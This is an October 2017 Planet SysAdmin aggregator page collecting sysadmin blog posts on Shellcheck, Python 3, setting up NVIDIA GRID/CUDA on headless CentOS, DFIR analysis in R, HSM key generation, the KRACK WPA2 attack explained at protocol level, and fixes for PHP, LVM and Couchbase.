Planet SysAdmin


October 19, 2017

Chris Siebenmann

Using Shellcheck is good for me

A few months ago I wrote an entry about my views on Shellcheck where I said that I found it too noisy to be interesting or useful to me. Well, you know what, I have to take that back. What happened is that as I've been writing various shell scripts since then, I've increasingly found myself reaching for Shellcheck as a quick syntax and code check that I could use without trying to run my script. Shellcheck is a great tool for this, and as a bonus it can suggest some simplifications and improvements.

(Perhaps there are other programs that can do the same sort of checking that shellcheck does, but if so I don't think I've run across them yet. The closest I know of is shfmt.)

Yes, Shellcheck is what you could call nitpicky (it's a linter, not just a code checker, so part of its job is making style judgments). But going along with it doesn't hurt (I've yet to find a situation where a warning was actively wrong) and it's easier to spot real problems if 'shellcheck <script>' is otherwise completely silent. I can live with the cost of sprinkling a bunch of quotes over the use of shell variables, and the result is more technically correct even if it's unlikely to ever make a practical difference.

In other words, using Shellcheck is good for me and my shell scripts even if it can be a bit annoying. Technically more correct is still 'more correct', and Shellcheck is right about the things it complains about regardless of what I think about it.

(With that said, I probably wouldn't bother using Shellcheck and fixing its complaints about unquoted shell variable usage if that was all it did. The key to its success here is that it adds value over and above its nit-picking; that extra value pushes me to use it, and using it pushes me to do the right thing by fixing my variable quoting to be completely correct.)

by cks at October 19, 2017 03:56 AM

October 18, 2017

Sean's IT Blog

Configuring a Headless CentOS Virtual Machine for NVIDIA GRID vGPU #blogtober

When IT administrators think of GPUs, the first thing that comes to mind for many is gaming.  But GPUs also have business applications.  They’re mainly found in high end workstations to support graphics intensive applications like 3D CAD and medical imaging.

But GPUs will have other uses in the enterprise.  Many of the emerging technologies, such as artificial intelligence and deep learning, utilize GPUs to perform compute operations.  These will start finding their way into the data center, either as part of line-of-business applications or as part of IT operations tools.  This could also allow the business to utilize GRID environments after hours for other forms of data processing.

This guide will show you how to build headless virtual machines that can take advantage of NVIDIA GRID vGPU for GPU compute and CUDA.  In order to do this, you will need to have a Pascal Series NVIDIA Tesla card such as the P4, P40, or P100 and the GRID 5.0 drivers.  The GRID components will also need to be configured in your hypervisor, and you will need to have the GRID drivers for Linux.

I’ll be using CentOS 7.x for this guide.  My base CentOS configuration is a minimal install with no graphical shell and a few additional packages like Nano and Open VM Tools.  I use Bob Planker’s guide for preparing my VM as a template.

The steps for setting up a headless CentOS VM with GRID are:

  1. Deploy your CentOS VM.  This can be from an existing template or installed from scratch.  This VM should not have a graphical shell installed, or it should be in a run mode that does not execute the GUI.
  2. Attach a GRID profile to the virtual machine by adding a shared PCI device in vCenter.  The selected profile will need to be one of the Virtual Workstation profiles, and these all end with a Q.
  3. GRID requires a 100% memory reservation.  When you add an NVIDIA GRID shared PCI device, there will be an associated prompt to reserve all system memory.
  4. Update the VM to ensure all applications and components are the latest version using the following command:
    yum update -y
  5. In order to build the GRID driver for Linux, you will need to install a few additional packages.  Install these packages with the following command:
    yum install -y epel-release dkms libstdc++.i686 gcc kernel-devel 
  6. Copy the Linux GRID drivers to your VM using a tool like WinSCP.  I generally place the files in /tmp.
  7. Make the driver package executable with the following command:
    chmod +X NVIDIA-Linux-x86_64-384.73-grid.run
  8. Execute the driver package.  When we execute this, we will also be adding the –dkms flag to support Dynamic Kernel Module Support.  This will enable the system to automatically recompile the driver whenever a kernel update is installed.  The commands to run the the driver install are:
    bash ./NVIDIA-Linux-x86_64-384.73-grid.run –dkms
  9. When prompted, select yes to register the kernel module sources with DKMS by selecting Yes and pressing Enter.
  10. You may receive an error about the installer not being able to locate the X Server path.  Click OK.  It is safe to ignore this error.
  11. Install the 32-bit Compatibility Libraries by selecting Yes and pressing Enter.
  12. At this point, the installer will start to build the DKMS module and install the driver.  
  13. After the install completes, you will be prompted to use the nvidia-xconfig utility to update your X Server configuration.  X Server should not be installed because this is a headless machine, so select No and press Enter.
  14. The install is complete.  Press Enter to exit the installer.
  15. To validate that the NVIDIA drivers are installed and running properly, run nvidia-smi to get the status of the video card.  
  16. Next, we’ll need to configure GRID licensing.  We’ll need to create the GRID licensing file from a template supplied by NVIDIA with the following command:
    cp  /etc/nvidia/gridd.conf.template  /etc/nvidia/gridd.conf
  17. Edit the GRID licensing file using the text editor of your choice.  I prefer Nano, so the command I would use is:
    nano  /etc/nvidia/gridd.conf
  18. Fill in the ServerAddress and BackupServerAddress fields with the fully-qualified domain name or IP addresses of your licensing servers.
  19. Set the FeatureType to 2 to configure the system to retrieve a Virtual Workstation license.  The Virtual Workstation license is required to support the CUDA features for GPU Compute.
  20. Save the license file.
  21. Restart the GRID Service with the following command:
    service nvidia-gridd restart
  22. Validate that the machine retrieved a license with the following command:
    grep gridd /var/log/messages
  23. Download the NVIDIA CUDA Toolkit.
    wget https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run
  24. Make the toolkit installer executable.
    chmod +x cuda_9.0.176_384.81_linux-run.sh
  25. Execute the CUDA Toolkit installer.
    bash cuda_9.0.176_384.81_linux-run.sh
  26. Accept the EULA.
  27. You will be prompted to download the CUDA Driver.  Press N to decline the new driver. This driver does not match the NVIDIA GRID driver version, and it will break the NVIDIA setup.  The GRID driver in the VM has to match the GRID software that is installed in the hypervisor.
  28. When prompted to install the CUDA 9.0 toolkit, press Y.
  29. Accept the Default Location for the CUDA toolkit.
  30. When prompted to create a symlink at /usr/local/cuda, press Y.
  31. When prompted to install the CUDA 9.0 samples, press Y.
  32. Accept the default location for the samples.
  33. Reboot the virtual machine.
  34. Log in and run nvidia-smi again.  Validate that you get the table output similar to step 15.  If you do not receive this, and you get an error, it means that you likely installed the driver that is included with the CUDA toolkit.  If that happens, you will need to start over.

At this point, you have a headless VM with the NVIDIA Drivers and CUDA Toolkit installed.  So what can you do with this?  Just about anything that requires CUDA.  You can experiment with deep learning frameworks like Tensorflow, build virtual render nodes for tools like Blender, or even use Matlab for GPU compute.


by seanpmassey at October 18, 2017 04:04 PM

Chris Siebenmann

I still like Python and often reach for it by default

Various local events recently made me think a bit about the future of Python at work. We're in a situation where a number of our existing tools will likely get drastically revised or entirely thrown away and replaced, and that raises local issues with Python 3 as well as questions of whether I should argue for changing our list of standard languages. I have some technical views on the answer, but thinking through this has made me realize something on a more personal level. Namely, I still like Python and it's my go-to default language for a number of things.

I'm probably always going to be a little bit grumpy about the whole transition toward Python 3, but that in no way erases the good parts of Python. Despite the baggage around it, Python 3 has its own good side and I remain reasonably enthused about it. Writing modest little programs in Python has never been a burden; the hard parts are never from Python, they're from figuring out things like data representation and that's the same challenge in any language. In the mean time, Python's various good attributes make it pretty plastic and easily molded as I'm shaping and re-shaping my code as I figure out more of how I want to do things.

(In other words, experimenting with my code is generally reasonably easy. When I may completely change how I approach a problem between my first draft and my second attempt, this is quite handy.)

Also, Python makes it very easy to do string-bashing and to combine it with basic Unix things. This describes a lot of what I do, which means that Python is a low-overhead way of writing something that is much like a shell script but that's more structured, better organized, and expresses its logic more clearly and directly (because it's not caught up in the Turing tarpit of Bourne shell).

(This sort of 'better shell script' need comes up surprisingly often.)

My tentative conclusion about what this means for me is that I should embrace Python 3, specifically I should embrace it for new work. Despite potential qualms for some things, new program that I write should be in Python 3 unless there's a strong reason they can't be (such as having to run on a platform with an inadequate or missing Python 3). The nominal end of life for Python 2 is not all that far off, and if I'm continuing with Python in general (and I am), then I should be carrying around as little Python 2 code as possible.

by cks at October 18, 2017 07:00 AM

HolisticInfoSec.org

McRee added to ISSA's Honor Roll for Lifetime Achievement

HolisticInfoSec's Russ McRee was pleased to be added to ISSA International's Honor Roll this month, a lifetime achievement award recognizing an individual's sustained contributions to the information security community, the advancement of the association and enhancement of the professionalism of the membership.
According to the press release:
"Russ McRee has a strong history in the information security as a teacher, practitioner and writer. He is responsible for 107 technical papers published in the ISSA Journal under his Toolsmith byline in 2006-2015. These articles represent a body of knowledge for the hands-on practitioner that is second to none. These titles span an extremely wide range of deep network security topics. Russ has been an invited speaker at the key international computer security venues including DEFCON, Derby Con, BlueHat, Black Hat, SANSFIRE, RSA, and ISSA International."
Russ greatly appreciates this honor and would like to extend congratulations to the ten other ISSA 2017 award winners. Sincere gratitude to Briana and Erin McRee, Irvalene Moni, Eric Griswold, Steve Lynch, and Thom Barrie for their extensive support over these many years.

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:35 AM

toolsmith #128 - DFIR Redefined: Deeper Functionality for Investigators with R - Part 1

“To competently perform rectifying security service, two critical incident response elements are necessary: information and organization.” ~ Robert E. Davis

I've been presenting DFIR Redefined: Deeper Functionality for Investigators with R across the country at various conference venues and thought it would helpful to provide details for readers.
The basic premise?
Incident responders and investigators need all the help they can get.
Let me lay just a few statistics on you, from Secure360.org's The Challenges of Incident Response, Nov 2016. Per their respondents in a survey of security professionals:
  • 38% reported an increase in the number of hours devoted to incident response
  • 42% reported an increase in the volume of incident response data collected
  • 39% indicated an increase in the volume of security alerts
In short, according to Nathan Burke, “It’s just not mathematically possible for companies to hire a large enough staff to investigate tens of thousands of alerts per month, nor would it make sense.”
The 2017 SANS Incident Response Survey, compiled by Matt Bromiley in June, reminds us that “2016 brought unprecedented events that impacted the cyber security industry, including a myriad of events that raised issues with multiple nation-state attackers, a tumultuous election and numerous government investigations.” Further, "seemingly continuous leaks and data dumps brought new concerns about malware, privacy and government overreach to the surface.”
Finally, the survey shows that IR teams are:
  • Detecting the attackers faster than before, with a drastic improvement in dwell time
  • Containing incidents more rapidly
  • Relying more on in-house detection and remediation mechanisms
To that end, what concepts and methods further enable handlers and investigators as they continue to strive for faster detection and containment? Data science and visualization sure can’t hurt. How can we be more creative to achieve “deeper functionality”? I propose a two-part series on Deeper Functionality for Investigators with R with the following DFIR Redefined scenarios:
  • Have you been pwned?
  • Visualization for malicious Windows Event Id sequences
  • How do your potential attackers feel, or can you identify an attacker via sentiment analysis?
  • Fast Frugal Trees (decision trees) for prioritizing criticality
R is “100% focused and built for statistical data analysis and visualization” and “makes it remarkably simple to run extensive statistical analysis on your data and then generate informative and appealing visualizations with just a few lines of code.”

With R you can interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment.
From the Win-Vector Blog, per John Mount “not all R users consider themselves to be expert programmers (many are happy calling themselves analysts). R is often used in collaborative projects where there are varying levels of programming expertise.”
I propose that this represents the vast majority of us, we're not expert programmers, data scientists, or statisticians. More likely, we're security analysts re-using code for our own purposes, be it red team or blue team. With a very few lines of R investigators might be more quickly able to reach conclusions.
All the code described in the post can be found on my GitHub.

Have you been pwned?

This scenario I covered in an earlier post, I'll refer you to Toolsmith Release Advisory: Steph Locke's HIBPwned R package.

Visualization for malicious Windows Event Id sequences

Windows Events by Event ID present excellent sequenced visualization opportunities. A hypothetical scenario for this visualization might include multiple failed logon attempts (4625) followed by a successful logon (4624), then various malicious sequences. A fantastic reference paper built on these principle is Intrusion Detection Using Indicators of Compromise Based on Best Practices and Windows Event Logs. An additional opportunity for such sequence visualization includes Windows processes by parent/children. One R library particularly well suited to is TraMineR: Trajectory Miner for R. This package is for mining, describing and visualizing sequences of states or events, and more generally discrete sequence data. It's primary aim is the analysis of biographical longitudinal data in the social sciences, such as data describing careers or family trajectories, and a BUNCH of other categorical sequence data. Somehow though, the project page somehow fails to mention malicious Windows Event ID sequences. :-) Consider Figures 1 and 2 as retrieved from above mentioned paper. Figure 1 are text sequence descriptions, followed by their related Windows Event IDs in Figure 2.

Figure 1
Figure 2
Taking related log data, parsing and counting it for visualization with R would look something like Figure 3.

Figure 3
How much R code does it take to visualize this data with a beautiful, interactive sunburst visualization? Three lines, not counting white space and comments, as seen in the video below.


A screen capture of the resulting sunburst also follows as Figure 4.

Figure 4


How do your potential attackers feel, or can you identify an attacker via sentiment analysis?

Do certain adversaries or adversarial communities use social media? Yes
As such, can social media serve as an early warning system, if not an actual sensor? Yes
Are certain adversaries, at times, so unaware of OpSec on social media that you can actually locate them or correlate against other geo data? Yes
Some excellent R code to assess Twitter data with includes Jeff Gentry's twitteR and rtweet to interface with the Twitter API.
  • twitteR: provides access to the Twitter API. Most functionality of the API is supported, with a bias towards API calls that are more useful in data analysis as opposed to daily interaction.
  • Rtweet: R client for interacting with Twitter’s REST and stream API’s.
The code and concepts here are drawn directly from Michael Levy, PhD UC Davis: Playing With Twitter.
Here's the scenario: DDoS attacks from hacktivist or chaos groups.
Attacker groups often use associated hashtags and handles and the minions that want to be "part of" often retweet and use the hashtag(s). Individual attackers either freely give themselves away, or often become easily identifiable or associated, via Twitter. As such, here's a walk-through of analysis techniques that may help identify or better understand the motives of certain adversaries and adversary groups. I don't use actual adversary handles here, for obvious reasons. I instead used a DDoS news cycle and journalist/bloggers handles as exemplars. For this example I followed the trail of the WireX botnet, comprised mainly of Android mobile devices utilized to launch a high-impact DDoS extortion campaign against multiple organizations in the travel and hospitality sector in August 2017. I started with three related hashtags: 
  1. #DDOS 
  2. #Android 
  3. #WireX
We start with all related Tweets by day and time of day. The code is succinct and efficient, as noted in Figure 5.

Figure 5
The result is a pair of graphs color coded by tweets and retweets per Figure 6.

Figure 6

This gives you an immediate feels for spikes in interest by day as well as time of day, particularly with attention to retweets.
Want to see what platforms potential adversaries might be tweeting from? No problem, code in Figure 7.
Figure 7

The result in the scenario ironically indicates that the majority of related tweets using our hashtags of interest are coming from Androids per Figure 8. :-)


Figure 8
Now to the analysis of emotional valence, or the "the intrinsic attractiveness (positive valence) or averseness (negative valence) of an event, object, or situation."
orig$text[which.max(orig$emotionalValence)] tells us that the most positive tweet is "A bunch of Internet tech companies had to work together to clean up #WireX #Android #DDoS #botnet."
orig$text[which.min(orig$emotionalValence)] tells us that "Dangerous #WireX #Android #DDoS #Botnet Killed by #SecurityGiants" is the most negative tweet.
Interesting right? Almost exactly the same message, but very different valence.
How do we measure emotional valence changes over the day? Four lines later...
filter(orig, mday(created) == 29) %>%
  ggplot(aes(created, emotionalValence)) +
  geom_point() + 
  geom_smooth(span = .5)
...and we have Figure 9, which tell us that most tweets about WireX were emotionally neutral on 29 AUG 2017, around 0800 we saw one positive tweet, a more negative tweets overall in the morning.

Figure 9
Another line of questioning to consider: which tweets are more often retweeted, positive or negative? As you can imagine with information security focused topics, negativity wins the day.
Three lines of R...
ggplot(orig, aes(x = emotionalValence, y = retweetCount)) +
  geom_point(position = 'jitter') +
  geom_smooth()
...and we learn just how popular negative tweets are in Figure 10.

Figure 10
There are cluster of emotionally neutral retweets, two positive retweets, and a load of negative retweets. This type of analysis can quickly lead to a good feel for the overall sentiment of an attacker collective, particularly one with less opsec and more desire for attention via social media.
In Part 2 of DFIR Redefined: Deeper Functionality for Investigators with R we'll explore this scenario further via sentiment analysis and Twitter data, as well as Fast Frugal Trees (decision trees) for prioritizing criticality.
Let me know if you have any questions on the first part of this series via @holisticinfosec or russ at holisticinfosec dot org.
Cheers...until next time. 

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:14 AM

October 17, 2017

The Lone Sysadmin

Advice On Downgrading Adobe Flash

VMware has a KB article out (linked below) about the Adobe Flash crashes that happen if you’re running the latest version of Flash (27.0.0.170). A lot of us were caught off guard recently when our PCs updated themselves and we couldn’t get into our VMware vSphere environments. The VMware KB article suggests downgrading your Flash […]

The post Advice On Downgrading Adobe Flash appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 17, 2017 03:59 PM

Everything Sysadmin

Final reminder: NYCDevOps tonight: "Storing Secrets in the Cloud"

Don't miss this meeting tonight!

  • Topic: Storing Secrets in Cloud based Key Management Services
  • Speaker: Dan O'Boyle, Stack Overflow, Inc.
  • Date: Tuesday, October 17, 2017
  • Time: 6:30-9:30 PM
  • Location: Stack Overflow HQ, 110 William St, 28th floor, NY, NY
  • https://www.meetup.com/nycdevops/events/241803854/

The A/C is fixed! Don't miss this cool event! Full details and RSVP.

by Tom Limoncelli at October 17, 2017 02:30 PM

Chris Siebenmann

My current grumpy view on key generation for hardware crypto keys

I tweeted:

My lesson learned from the Infineon HSM issue is to never trust a HSM to generate keys, just to store them. Generate keys on a real machine.

In my usual manner, this is perhaps overstated for Twitter. So let's elaborate on it a bit, starting with the background.

When I first heard about the Infineon TPM key generation issue (see also the technical blog article), I wasn't very concerned, since we don't have sophisticated crypto smartcards or electronic ID cards or the like. Then I found out that some Yubikeys are affected and got grumpy. When I set up SSH keys on my Yubikey 4, I had the Yubikey itself generate the RSA key involved. After all, why not? That way the key was never exposed on my Linux machine, even if the practical risks were very low. Unfortunately, this Infineon issue now shows the problem in that approach.

In theory, a hardware key like the Yubikey is a highly secure physical object that just works. In practice they are little chunks of inexpensive hardware that run some software, and there's nothing magical about that software; like all software, it's subject to bugs and oversights. This means that in practice, there is a tradeoff about where you generate your keys. If you generate them inside the HSM instead of on your machine, you don't have to worry about your machine being compromised or the quality of your software, but you do have to worry about the quality of the HSM's software (and related to that, the quality of the random numbers that the HSM can generate).

(Another way to put this is that a HSM is just a little computer that you can't get at, running its own collection of software on some hardware that's often pretty tiny and limited.)

As a practical matter, the software I'd use for key generation on my Linux machine is far more scrutinized (especially these days) and thus almost certainly much more trustworthy than the opaque proprietary software inside a HSM. The same is true for /dev/urandom on a physical Linux machine such as a desktop or a laptop. It's possible that a HSM could do a better job on both fronts, but it's extremely likely that my Linux machine is good enough on both. That leaves machine compromise, which is a very low probability issue for most people. And if you're a bit worried, there are also mitigation strategies for the cautious, starting with disconnecting from the network, turning off swap, generating keys into a tmpfs, and then rebooting your machine afterward.

Once upon a time (only a year ago), I thought that the balance of risks made it perfectly okay to generate RSA keys in the Yubikey HSM. It turns out that I was wrong in practice, and now I believe that I was wrong in general for me and most people. I now feel that the balance of risks strongly favour trusting the HSM more or less as little as possible, which means only trusting it to hold keys securely and perhaps limit their use to only when the HSM is unlocked or the key usage is approved.

(This is actually giving past me too much credit. Past me didn't even think about the risk that the Yubikey software could have bugs; past me just assumed that of course it didn't and therefor was axiomatically better than generating keys on the local machine and moving them into the HSM. After all, who would sell a HSM that didn't have very carefully audited and checked software? I really should have known better, because the answer is 'nearly everyone'.)

PS: If you have a compliance mandate that keys can never be created on a general-purpose machine in any situation where they might make it to the outside world, you have two solutions (at least). One of them involves hope and then perhaps strong failure, as here with Infineon, and one of them involves a bunch of work, some persuasion, and perhaps physically destroying some hardware afterward if you're really cautious.

by cks at October 17, 2017 04:18 AM

October 16, 2017

ma.ttias.be

Compile PHP from source: error: utf8_mime2text() has new signature

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

It's been a while, but I had to recompile a PHP from source and ran into this problem during the ./configure stage.

$ ./configure
...
checking for IMAP Kerberos support... no
checking for IMAP SSL support... yes
checking for utf8_mime2text signature... new
checking for U8T_DECOMPOSE...
configure: error: utf8_mime2text() has new signature, but U8T_CANONICAL is missing.
This should not happen. Check config.log for additional information.

To resolve that utf8_mime2text() has new signature, but U8T_CANONICAL is missing error, on CentOS you can install the libc-client-devel package.

$ yum install libc-client-devel

After that, your ./configure should go through.

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

by Mattias Geniar at October 16, 2017 08:30 PM

Errata Security

Some notes on the KRACK attack

This is my interpretation of the KRACK attacks paper that describes a way of decrypting encrypted WiFi traffic with an active attack.

tl;dr: Wow. Everyone needs to be afraid. (Well, worried -- not panicked.) It means in practice, attackers can decrypt a lot of wifi traffic, with varying levels of difficulty depending on your precise network setup. My post last July about the DEF CON network being safe was in error.

Details

This is not a crypto bug but a protocol bug (a pretty obvious and trivial protocol bug).

When a client connects to the network, the access-point will at some point send a random "key" data to use for encryption. Because this packet may be lost in transmission, it can be repeated many times.

What the hacker does is just repeatedly sends this packet, potentially hours later. Each time it does so, it resets the "keystream" back to the starting conditions. The obvious patch that device vendors will make is to only accept the first such packet it receives, ignore all the duplicates.

At this point, the protocol bug becomes a crypto bug. We know how to break crypto when we have two keystreams from the same starting position. It's not always reliable, but reliable enough that people need to be afraid.

Android, though, is the biggest danger. Rather than simply replaying the packet, a packet with key data of all zeroes can be sent. This allows attackers to setup a fake WiFi access-point and man-in-the-middle all traffic.

In a related case, the access-point/base-station can sometimes also be attacked, affecting the stream sent to the client.

Not only is sniffing possible, but in some limited cases, injection. This allows the traditional attack of adding bad code to the end of HTML pages in order to trick users into installing a virus.

This is an active attack, not a passive attack, so in theory, it's detectable.

Who is vulnerable?

Everyone, pretty much.

The hacker only needs to be within range of your WiFi. Your neighbor's teenage kid is going to be downloading and running the tool in order to eavesdrop on your packets.

The hacker doesn't need to be logged into your network.

It affects all WPA1/WPA2, the personal one with passwords that we use in home, and the enterprise version with certificates we use in enterprises.

It can't defeat SSL/TLS or VPNs. Thus, if you feel your laptop is safe surfing the public WiFi at airports, then your laptop is still safe from this attack. With Android, it does allow running tools like sslstrip, which can fool many users.

Your home network is vulnerable. Many devices will be using SSL/TLS, so are fine, like your Amazon echo, which you can continue to use without worrying about this attack. Other devices, like your Phillips lightbulbs, may not be so protected.

How can I defend myself?

Patch.

More to the point, measure your current vendors by how long it takes them to patch. Throw away gear by those vendors that took a long time to patch and replace it with vendors that took a short time.

High-end access-points that contains "WIPS" (WiFi Intrusion Prevention Systems) features should be able to detect this and block vulnerable clients from connecting to the network (once the vendor upgrades the systems, of course). Even low-end access-points, like the $30 ones you get for home, can easily be updated to prevent packet sequence numbers from going back to the start (i.e. from the keystream resetting back to the start).

At some point, you'll need to run the attack against yourself, to make sure all your devices are secure. Since you'll be constantly allowing random phones to connect to your network, you'll need to check their vulnerability status before connecting them. You'll need to continue doing this for several years.

Of course, if you are using SSL/TLS for everything, then your danger is mitigated. This is yet another reason why you should be using SSL/TLS for internal communications.

Most security vendors will add things to their products/services to defend you. While valuable in some cases, it's not a defense. The defense is patching the devices you know about, and preventing vulnerable devices from attaching to your network.

If I remember correctly, DEF CON uses Aruba. Aruba contains WIPS functionality, which means by the time DEF CON roles around again next year, they should have the feature to deny vulnerable devices from connecting, and specifically to detect an attack in progress and prevent further communication.

However, for an attacker near an Android device using a low-powered WiFi, it's likely they will be able to conduct man-in-the-middle without any WIPS preventing them.


by Robert Graham (noreply@blogger.com) at October 16, 2017 07:27 PM

Cryptography Engineering

Falling through the KRACKs

The big news in crypto today is the KRACK attack on WPA2 protected WiFi networks. Discovered by Mathy Vanhoef and Frank Piessens at KU Leuven, KRACK (Key Reinstallation Attack) leverages a vulnerability in the 802.11i four-way handshake in order to facilitate decryption and forgery attacks on encrypted WiFi traffic.

The paper is here. It’s pretty easy to read, and you should.

I don’t want to spend much time talking about KRACK itself, because the vulnerability is pretty straightforward. Instead, I want to talk about why this vulnerability continues to exist so many years after WPA was standardized. And separately, to answer a question: how did this attack slip through, despite the fact that the 802.11i handshake was formally proven secure?

A quick TL;DR on KRACK

For a detailed description of the attack, see the KRACK website or the paper itself. Here I’ll just give a brief, high level description.

The 802.11i protocol (also known as WPA2) includes two separate mechanisms to ensure the confidentiality and integrity of your data. The first is a record layer that encrypts WiFi frames, to ensure that they can’t be read or tampered with. This encryption is (generally) implemented using AES in CCM mode, although there are newer implementations that use GCM mode, and older ones that use RC4-TKIP (we’ll skip these for the moment.)

The key thing to know is that AES-CCM (and GCM, and TKIP) is a stream cipher, which means it’s vulnerable to attacks that re-use the same key and “nonce”, also known as an initialization vector. 802.11i deals with this by constructing the initialization vector using a “packet number” counter, which initializes to zero after you start a session, and always increments (up to 2^48, at which point rekeying must occur). This should prevent any nonce re-use, provided that the packet number counter can never be reset.

The second mechanism you should know about is the “four way handshake” between the AP and a client (supplicant) that’s responsible for deriving the key to be used for encryption. The particular message KRACK cares about is message #3, which causes the new key to be “installed” (and used) by the client.

I’m a four-way handshake. Client is on the left, AP is in the right. (courtesy Wikipedia, used under CC).

The key vulnerability in KRACK (no pun intended) is that the acknowledgement to message #3 can be blocked by adversarial nasty people.* When this happens, the AP re-transmits this message, which causes (the same) key to be reinstalled into the client (note: see update below*). This doesn’t seem so bad. But as a side effect of installing the key, the packet number counters all get reset to zero. (And on some implementations like Android 6, the key gets set to zero — but that’s another discussion.)

The implication is that by forcing the AP to replay this message, an adversary can cause a connection to reset nonces and thus cause keystream re-use in the stream cipher. With a little cleverness, this can lead to full decryption of traffic streams. And that can lead to TCP hijacking attacks. (There are also direct traffic forgery attacks on GCM and TKIP, but this as far as we go for now.)

How did this get missed for so long?

If you’re looking for someone to blame, a good place to start is the IEEE. To be clear, I’m not referring to the (talented) engineers who designed 802.11i — they did a pretty good job under the circumstances. Instead, blame IEEE as an institution.

One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they’re hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications — you’ll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck.

The IEEE has been making a few small steps to ease this problem, but they’re hyper-timid incrementalist bullshit. There’s an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they’ve been public for six months — coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software.

This whole process is dumb and — in this specific case — probably just cost industry tens of millions of dollars. It should stop.

The second problem is that the IEEE standards are poorly specified. As the KRACK paper points out, there is no formal description of the 802.11i handshake state machine. This means that implementers have to implement their code using scraps of pseudocode scattered around the standards document. It happens that this pseudocode leads to the broken implementation that enables KRACK. So that’s bad too.

And of course, the final problem is implementers. One of the truly terrible things about KRACK is that implementers of the WPA supplicant (particularly on Linux) managed to somehow make Lemon Pledge out of lemons. On Android 6 in particular, replaying message #3 actually sets an all-zero key. There’s an internal logic behind why this happens, but Oy Vey. Someone actually needs to look at this stuff.

What about the security proof?

The fascinating thing about the 802.11i handshake is that despite all of the roadblocks IEEE has thrown in people’s way, it (the handshake, at least) has been formally analyzed. At least, for some definition of the term.

(This isn’t me throwing shade — it’s a factual statement. In formal analysis, definitions really, really matter!)

A paper by He, Sundararajan, Datta, Derek and Mitchell (from 2005!) looked at the 802.11i handshake and tried to determine its security properties. What they determined is that yes, indeed, it did produce a secret and strong key, even when an attacker could tamper with and replay messages (under various assumptions). This is good, important work. The proof is hard to understand, but this is par for the course. It seems to be correct.

Representation of the 4-way handshake from the paper by He et al. Yes, I know you’re like “what?“. But that’s why people who do formal verification of protocols don’t have many friends.

Even better, there are other security proofs showing that — provided the nonces are never repeated — encryption modes like CCM and GCM are highly secure. This means that given a secure key, it should be possible to encrypt safely.

So what went wrong?

The critical problem is that while people looked closely at the two components — handshake and encryption protocol — in isolation, apparently nobody looked closely at the two components as they were connected together. I’m pretty sure there’s an entire geek meme about this.

Two unit tests, 0 integration tests, thanks Twitter.

Of course, the reason nobody looked closely at this stuff is that doing so is just plain hard. Protocols have an exponential number of possible cases to analyze, and we’re just about at the limit of the complexity of protocols that human beings can truly reason about, or that peer-reviewers can verify. The more pieces you add to the mix, the worse this problem gets.

In the end we all know that the answer is for humans to stop doing this work. We need machine-assisted verification of protocols, preferably tied to the actual source code that implements them. This would ensure that the protocol actually does what it says, and that implementers don’t further screw it up, thus invalidating the security proof.

This needs to be done urgently, but we’re so early in the process of figuring out how to do it that it’s not clear what it will take to make this stuff go live. All in all, this is an area that could use a lot more work. I hope I live to see it.

===

* Update: An early version of this post suggested that the attacker would replay the third message. This can indeed happen, and it does happen in some of the more sophisticated attacks. But primarily, the paper describes forcing the AP to resend it by blocking the acknowledgement from being received at the AP. Thanks to Nikita Borisov and Kyle Birkeland for the fix!


by Matthew Green at October 16, 2017 01:27 PM

ma.ttias.be

KRACK Attacks: Breaking WPA2

The post KRACK Attacks: Breaking WPA2 appeared first on ma.ttias.be.

Good thing we have protocols like HTTPS, SSH & STARTTLS.

Basically, assume every WiFi is an unencrypted transport layer.

We discovered serious weaknesses in WPA2, a protocol that secures all modern protected Wi-Fi networks. An attacker within range of a victim can exploit these weaknesses using key reinstallation attacks (KRACKs). Concretely, attackers can use this novel attack technique to read information that was previously assumed to be safely encrypted. This can be abused to steal sensitive information such as credit card numbers, passwords, chat messages, emails, photos, and so on. The attack works against all modern protected Wi-Fi networks.

Source: KRACK Attacks: Breaking WPA2

The post KRACK Attacks: Breaking WPA2 appeared first on ma.ttias.be.

by Mattias Geniar at October 16, 2017 09:17 AM

October 15, 2017

LZone - Sysadmin

HowTo Mount LVM Partitions

Find out which LVM parititions you have by running
lvdisplay
and mount the one you need with
mount /dev/vg0/vol1 /mnt
See also:

October 15, 2017 05:39 PM

Is there hope when your Couchbase cluster is stuck in compacting buckets?

Well to be anticlimactic: no.

Scope

This seems to be at least a Couchbase 3.x problem. So far I haven't experienced it with Couchbase 4. Of both versions I only know about the so called community edition.

As for the frequency: Couchbase 3 getting stuck on bucket compacting is propabilistic. In the setups I've run so far it happens every half a year. But this might be load-dependant. Actually never having had the issue on some "smaller" clusters, I actually think it is.

The Symptoms

If you do not monitor explicitly for the compacting status, you will probably noticy by some nodes disks running full. Compacting not working anymore means, the Couchbase disk fragmentation growing and finally filling you disks.

If you look in the GUI you will see a constant "Compacting..." indicator in the top right of the admin GUI. In normal operation it never takes more than some minutes to finish (again depending on your usage).

Things that do not work...

  • Removing nodes: actually in this cluster state you cannot remove nodes anymore. It seems the compacting operation is locking the cluster. So disconnecting the disk full nodes won't work and neither won't help.
  • Restarting the cluster: wether it is rebooting or simply restarting all instances in sequence or putting the entire cluster down and restarting it, won't help as the compacting issue stays persistent (see root cause below).
  • Removing load: also doesn't help. The cluster doesn't recover if it has no requests anymore

What does help...

  • Reinstall your cluster: Yeah!
  • Stopping traffic + flushing buckets: If you can afford the downtime / cold-cache stop all traffic, flush the causing buckets and reenable traffic.

The root cause

What actually happened is a data structure corruption from which Couchbase 3 does not recover. This is also the reason why flushing buckets helps.

There are several bug reports in Couchbase 2, 3 and 4 about compacting stuck for different reasons. In general Couchbase is not a very stable product in this regard...

October 15, 2017 04:25 PM

ma.ttias.be

Get shell in running Docker container

The post Get shell in running Docker container appeared first on ma.ttias.be.

